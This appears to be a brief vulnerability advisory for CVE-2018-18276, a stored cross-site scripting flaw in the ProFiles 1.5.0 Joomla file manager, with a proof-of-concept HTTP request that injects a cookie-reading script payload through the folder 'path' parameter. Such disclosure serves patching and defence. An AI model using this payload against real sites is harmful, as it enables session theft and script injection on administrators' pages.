ProFiles 1.5 component for Joomla Stored XSS vulnerability CVE-2018-18276
Affected Product: ProFiles - Joomla Web Filemanager - 1.5.0 Free Version
Credits: Vulnerability discovered by Claudio Cinquino
Proof of Concept
Affected Component: Component Create New Folder , parameter Name and path
|
POST /administrator/index.php?option=com_profiles&format=raw&view=rootsandrights HTTP/1.1 Host: x User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://x/administrator/index.php?option=com_profiles&format=raw&view=rootsandrights Content-Type: application/x-www-form-urlencoded Content-Length: 91 Cookie: mtoggleimageview=1; profilesissaved=0; mtableheader=220%2C100%2C100%2C100%2C120%2C80; tooltip=0; mtoggleimageview=0; mtableheader=220%2C100%2C100%2C100%2C120%2C80; filesView=2; 00cb299d45f4b885524ca28e22c3a170=kfsle6nr07anh8d1nh9ijfiio4; b442fd2cca79b1deb66ec5630b09da50=jdbqm7mp74g3q5op4ts6a3tej1 Connection: close Upgrade-Insecure-Requests: 1 task=&grouptab=&send=1&id=-1&name=test&path=test" autofocus onfocus=alert(document.cookie)>
|
